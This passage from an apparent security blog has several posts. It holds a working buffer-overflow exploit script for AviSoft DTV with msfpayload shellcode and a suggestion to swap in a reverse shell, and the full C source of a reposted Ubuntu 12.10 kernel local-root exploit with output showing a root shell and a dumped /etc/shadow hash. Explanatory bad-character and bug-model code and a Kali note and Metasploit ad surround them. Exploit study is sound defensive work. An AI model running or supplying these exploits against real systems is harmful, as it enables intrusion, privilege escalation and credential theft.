"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") #Every byte value except \x00, from bytearray.txt

try:
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Now generate the file “badchar.PLF”. Attach the application to the debugger, run, open “badchar.PLF” and use another mona command:

!mona compare -f C:\mona\AviosoftDTV\bytearray.bin

It will create another file called “compare.txt”, where we will see something like this:

Open “compare.txt” in Notepad and search for “stack” (http://pastebin.com/YLCnyne7); after scrolling down a little bit I can see:

                | File           | Memory         | Note       
---------------------------------------------------------------
0 0 9 9 | 01 ... 09 | 01 ... 09 | unmodified!
---------------------------------------------------------------
9 9 99 100 | 0a ... 6c | 00 ... 61 | expanded
108 109 1 1 | 6d | 6d | unmodified!
109 110 5 5 | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted
114 115 1 1 | 73 | 73 | unmodified!
115 116 2 2 | 74 75 | 5c 41 | corrupted
117 118 1 1 | 76 | 76 | unmodified!
118 119 137 137 | 77 ... ff | 69 ... 00 | corrupted

Possibly bad chars: 0a
Bytes omitted from input: 00

It compares the file’s data with memory. If there are no bad chars then the File and Memory data will be the same. See this line from above:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded 

Unfortunately it did not match. Mona also suggests that the bad char may be “0a”, because “0a” from the file does not match memory… is it?

So this time again we need to generate the bytearray:

!mona bytearray -b "\x00\x0a"

Now we again need to compare with the bytearray (see above, it is the same)…. Just keep doing it until all the bad chars are found.
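The bytearray/compare cycle above is the same every round, so here is an added Python version of it (my own code, not mona’s): the file-vs-memory alignment that produces the unmodified/corrupted/expanded rows of compare.txt, the “possibly bad char” it reports, and the loop that excludes that byte and repeats. Because the real player is not available offline, a constructed fake_parser stands in for the application; it expands 0a, stops at 1a and drops ff, so its answer is close to, but not identical with, the list found in this post.

```python
import difflib

RUN_LABEL = {"equal": "unmodified", "replace": "corrupted",
             "insert": "expanded", "delete": "truncated"}


def compare_runs(file_bytes, mem_bytes):
    """Align what was written to the file with what was found in memory and
    label each run the way compare.txt does. Returns (label, file hex, mem hex)."""
    sm = difflib.SequenceMatcher(None, file_bytes, mem_bytes, autojunk=False)
    return [(RUN_LABEL[tag], file_bytes[i1:i2].hex(), mem_bytes[j1:j2].hex())
            for tag, i1, i2, j1, j2 in sm.get_opcodes()]


def first_bad_char(file_bytes, mem_bytes):
    """The file byte at which file and memory first diverge (mona's
    'Possibly bad chars'), or None when the whole array survived intact."""
    sm = difflib.SequenceMatcher(None, file_bytes, mem_bytes, autojunk=False)
    for tag, i1, _i2, _j1, _j2 in sm.get_opcodes():
        if tag != "equal":
            return file_bytes[i1] if i1 < len(file_bytes) else None
    return None


def bytearray_without(excluded):
    """Equivalent of '!mona bytearray -b ...': every byte value except the excluded ones."""
    return bytes(b for b in range(256) if b not in excluded)


def find_bad_chars(transform, excluded=(0x00,)):
    """Repeat the post's cycle: generate the array, see what survives in memory,
    exclude the first byte that diverged, until file and memory agree.
    `transform` plays the application: it maps file bytes to memory bytes."""
    excluded = set(excluded)
    while True:
        arr = bytearray_without(excluded)
        bad = first_bad_char(arr, transform(arr))
        if bad is None:
            return sorted(excluded)
        excluded.add(bad)


def fake_parser(data):
    """Constructed stand-in for the player (not the real application): it cuts
    the buffer at an EOF marker (1a), turns 0a into 0d 0a and drops ff."""
    data = data.split(b"\x1a", 1)[0]
    data = data.replace(b"\x0a", b"\x0d\x0a")
    return data.replace(b"\xff", b"")


if __name__ == "__main__":
    arr = bytearray_without({0x00})
    for label, in_file, in_mem in compare_runs(arr, fake_parser(arr)):
        print("%-10s | %-20s | %s" % (label, in_file[:20], in_mem[:20]))
    print("Possibly bad chars: %02x" % first_bad_char(arr, fake_parser(arr)))
    print("All bad chars:", ["%02x" % b for b in find_bad_chars(fake_parser)])
```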


EXECUTE SHELLCODE
With mona I found that the bad chars are “\x00\xff\x0a\x0d\x1a”. After finding these bad chars I regenerated the shellcode:

root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\x0d\x1a\xff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)


Well, let’s modify the script again and change the shellcode. The final reliable working exploit is:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260 #Found by mona.py
eip ="\xab\xa7\x11\x64" #EIP
junk="\x90"*500 #500 NOPs before real shellcode

#msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\x0d\x1a\xff" -t c
shellcode=("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
shellcode+="\x90"*900 #Okay, need enough junk, so NOPs instead of "A"

all=push+eip+junk+shellcode

try:
    f.write(all)
    f.close()
    print "File created"
except:
    print "File cannot be created"

After regenerating “crash-me.PLF”, open it in AviSoft DTV and it will execute calc.exe. I did it in the debugger by pressing F9:

At any time we can change the windows/exec shellcode to a reverse shellcode, which will connect back to my specified IP address with a command shell.

The same exploit works on Windows 7 too:

Because I used an EIP address from the application itself. If I had used an EIP from an OS DLL then of course the exploit wouldn’t work there (the advantage of the application’s DLL).

This is it!

Note: Exploit writing is much more about research. Without research it is not possible to be an exploit writer. If you have questions or advice, please comment here or mail me and I will try to answer (I love to discuss!).
If you want to learn more about exploit development (in detail), read Corelan’s tutorials at https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/. Much better than other commercial training :).

Backtrack reborn as Kali – downloaded Kali Linux

BackTrack is reborn as Kali Linux. Yesterday I downloaded Kali Linux from http://www.kali.org/downloads/, which has GNOME as the default DE (classic mode). Most penetration testers know about BackTrack Linux, which was Ubuntu based. Now it is based on Debian, which is a big advantage. It is nicer that they made it simpler and it looks beautiful.

It seems they did not include many new tools; maybe they even excluded some tools from Kali Linux. There is also no directory called /penetesting.

All tools are installed in /usr/bin and /usr/local/sbin. People now need to search for the tools using locate, whereis, etc. if they don’t know a tool’s name. Truthfully, Kali (BackTrack Linux) is now a bit hard for newbies, and newbies should not try this pentesting distribution. But believe me, it is now good enough.

Note: using tools is not skiddish. Everybody uses tools. The operating system itself is a tool. Skids are those who do things without knowing anything. You are good to go with the new Kali Linux if you are good at Linux (Debian).

Kali: http://www.kali.org/downloads/

Ubuntu 12.10 Local Root Exploit

Everybody knows Ubuntu is a popular Linux distro (basically for newbies). Today I was visiting exploit-db and found the Ubuntu 12.10 local root exploit, which works only on 64-bit.

I tested the code since I already had Ubuntu 12.10 installed on my VM.

Code:

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

/* Runs in kernel context: replaces the caller's credentials with root's. */
int __attribute__((regparm(3)))
x()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

/* jmp qword [rip+0], followed by the 8-byte address of x() patched in below. */
char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main() {
    int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;

    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    /* Ubuntu 12.10 x86_64: kernel symbol addresses and the out-of-range
       family value are specific to the kernel this was tested on. */
    req.r.sdiag_family = 0x37;
    commit_creds = (_commit_creds) 0xffffffff8107d180;
    prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;

    /* Map the low address the kernel will read its handler pointer from. */
    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
             MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

        printf("mmap fault\n");
        exit(1);
    }

    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

    send(fd, &req, sizeof(req), 0);
    if(!getuid())
        system("/bin/sh");
}

test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c ubu
test@weird:~/Documents$ ./ubu
# whoami
root

# cat /etc/passwd
# cat /etc/shadow
root:!:15651:0:99999:7:::
daemon:*:15630:0:99999:7:::
bin:*:15630:0:99999:7:::
sys:*:15630:0:99999:7:::
sync:*:15630:0:99999:7:::
games:*:15630:0:99999:7:::
man:*:15630:0:99999:7:::
lp:*:15630:0:99999:7:::
mail:*:15630:0:99999:7:::
news:*:15630:0:99999:7:::
uucp:*:15630:0:99999:7:::
proxy:*:15630:0:99999:7:::
www-data:*:15630:0:99999:7:::
backup:*:15630:0:99999:7:::
list:*:15630:0:99999:7:::
irc:*:15630:0:99999:7:::
gnats:*:15630:0:99999:7:::
nobody:*:15630:0:99999:7:::
libuuid:!:15630:0:99999:7:::
syslog:*:15630:0:99999:7:::
messagebus:*:15630:0:99999:7:::
avahi-autoipd:*:15630:0:99999:7:::
usbmux:*:15630:0:99999:7:::
whoopsie:*:15630:0:99999:7:::
kernoops:*:15630:0:99999:7:::
rtkit:*:15630:0:99999:7:::
colord:*:15630:0:99999:7:::
lightdm:*:15630:0:99999:7:::
avahi:*:15630:0:99999:7:::
hplip:*:15630:0:99999:7:::
pulse:*:15630:0:99999:7:::
saned:*:15630:0:99999:7:::
kdm:*:15650:0:99999:7:::
test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::


This is really great!

Source: http://www.exploit-db.com/exploits/24746/
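The bug the exploit above leans on (CVE-2013-1763) is a missing bounds check: the kernel's sock_diag code took the sdiag_family byte straight from the netlink request and used it as an index into a fixed-size handler table, so a family of 0x37 read a "function pointer" from whatever memory followed the table, and the exploit's RWX mapping at 0x1a000 is placed so that value lands in the NOP sled. The upstream fix rejects sdiag_family >= AF_MAX before the lookup. The following is an added, userspace-only model of that dispatch pattern, written for this page and not taken from the kernel or from the exploit: the table, the handler names, the AF_MAX value (40) and the decoy value at slot 0x37 are all constructed here to make the overrun observable.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MODEL_AF_MAX  40   /* assumed AF_MAX for the 3.x kernels the exploit targets */
#define MODEL_AF_UNIX 1
#define MODEL_AF_INET 2
#define SPILL_SLOTS   32   /* fake "memory after the table" so index 0x37 hits something */

typedef int (*diag_handler)(unsigned family);

static int unix_diag_handler(unsigned family) { return 100 + (int)family; }
static int inet_diag_handler(unsigned family) { return 200 + (int)family; }

/* One flat array: slots [0, AF_MAX) are the handler table proper, the rest
 * stand in for whatever the kernel happened to place after it. Keeping it a
 * single object keeps the out-of-range read well-defined in this model. */
struct diag_model {
    uintptr_t slots[MODEL_AF_MAX + SPILL_SLOTS];
};

/* Constructed layout: two registered families, and a small pointer-sized value
 * at slot 0x37 standing in for the kernel data the exploit relies on falling
 * inside its PROT_EXEC mapping at 0x1a000..0x2a000. */
void diag_model_init(struct diag_model *m) {
    for (size_t i = 0; i < MODEL_AF_MAX + SPILL_SLOTS; i++)
        m->slots[i] = 0;
    m->slots[MODEL_AF_UNIX] = (uintptr_t)unix_diag_handler;
    m->slots[MODEL_AF_INET] = (uintptr_t)inet_diag_handler;
    m->slots[0x37] = 0x1a7c0;   /* hypothetical value, chosen to fall in the exploit's map */
}

/* Vulnerable dispatch: trusts the family byte from the request and indexes the
 * table directly. Returns the address that would be called (0 for an empty
 * slot) so the caller can see where control would go. */
uintptr_t diag_target_vulnerable(const struct diag_model *m, unsigned family) {
    return m->slots[family];
}

/* Hardened dispatch, mirroring the upstream fix: refuse out-of-range families
 * before touching the table. Returns 0 and fills *target on success, -EINVAL
 * for a bad family, -ENOENT for a family with no registered handler. */
int diag_target_fixed(const struct diag_model *m, unsigned family, uintptr_t *target) {
    if (family >= MODEL_AF_MAX)
        return -EINVAL;
    if (m->slots[family] == 0)
        return -ENOENT;
    *target = m->slots[family];
    return 0;
}

/* True if an address falls inside the exploit's mapping, i.e. the vulnerable
 * path would jump into attacker-controlled userspace memory. */
int lands_in_exploit_map(uintptr_t addr) {
    const uintptr_t map_start = 0x1a000, map_size = 0x10000;   /* from the exploit above */
    return addr >= map_start && addr < map_start + map_size;
}

int main(void) {
    struct diag_model m;
    uintptr_t target = 0;
    int rc;

    diag_model_init(&m);

    target = diag_target_vulnerable(&m, 0x37);
    printf("vulnerable: family 0x37 -> %#lx (%s)\n", (unsigned long)target,
           lands_in_exploit_map(target) ? "inside exploit mapping" : "elsewhere");

    rc = diag_target_fixed(&m, 0x37, &target);
    printf("fixed: family 0x37 -> rc=%d (EINVAL is %d)\n", rc, -EINVAL);

    rc = diag_target_fixed(&m, MODEL_AF_UNIX, &target);
    printf("fixed: AF_UNIX -> rc=%d, handler returns %d\n", rc,
           rc == 0 ? ((diag_handler)target)(MODEL_AF_UNIX) : -1);
    return 0;
}
```

The point of the model is the ordering: the check on the user-controlled index has to run before the table read, and an index equal to the table size is already out of range, which is why the fix compares with >= rather than >.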

Metasploit Training!


METASPLOIT TRAINING

A friend of mine is providing basic Metasploit training for newbies. If you are new to Metasploit and want to learn something about it, you can take this course. Remember, it is not a professional course!

Main topics:
1. Fundamentals (the basics).
2. Information gathering (the first and most important step for a hacker).
3. Using the powerful auxiliary modules to find vulnerabilities (powerful hacking tools).
4. Exploiting a specific vulnerability (which vulnerability are we going to exploit?).
5. Hacking Windows XP to Windows 7.
6. Exploit development with custom Metasploit modules and Python (found a 0day, but where is the shellcode?).
7. Post-exploitation (got access, but now what?).
